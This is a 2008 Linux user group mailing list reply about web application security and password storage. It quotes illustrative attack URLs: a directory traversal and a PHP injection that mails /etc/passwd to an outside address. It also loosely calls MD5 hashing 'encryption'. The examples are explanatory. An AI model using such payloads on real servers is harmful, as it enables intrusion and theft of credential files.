[Klug-general] password / security question / coding
Jeremy Hooks
jeremyhooks at googlemail.com
Mon Oct 20 12:19:53 UTC 2008
>> dont forget any web application can be a potential way into a server for an
>> attacker, as well as any listening daemons running on a box. If a web app can
>> read a file then the box does not need to be compromised for the attacker to
>> get the contents, just the app itself. here is a really basic (and stupid)
>> example:
>>
>> the logon url for an app is:
>> http://url/script.php?template=login.html
>>
>> an attacker could try (dir traversal):
>> http://url/script.php?template=../../../../secret/passwd.txt
>>
>> or even (code execution):
>> http://url/script.php?template=<%php
>> mail('a at a.com', '',file_get_contents('/etc/passwd')); %>
>>
>> these are lame examples but hopefully they make the point.
Hi MacGyver.
I know they are lame examples but if you had a server configuration
and PHP scripts
installed which allowed any of the above I would consider the server
to be compromised
(though perhaps not in the same sense you meant compromised).
> what about using an md5 sum to encrypt the password then use that same
> sum to unencrypt the passwords in the store is that kind of what your
> getting at ?
Hi Oly.
I'm not totally sure what you are getting at above. Are you meaning
to use an MD5 hash as
a passphrase to encrypt a file? That might be useful but you would
need to treat the hash
same way you would a plain text password - because that's what it is
to the encrypted file.
BTW, I might be teaching you to suck eggs, but are you aware that MD5
hashing/encryption
is a one way form of encryption. i.e. it isn't possible to decrypt,
only re-encrypt and see if the
two encryptions match.
Regards.
Jeremy.
More information about the Kent
mailing list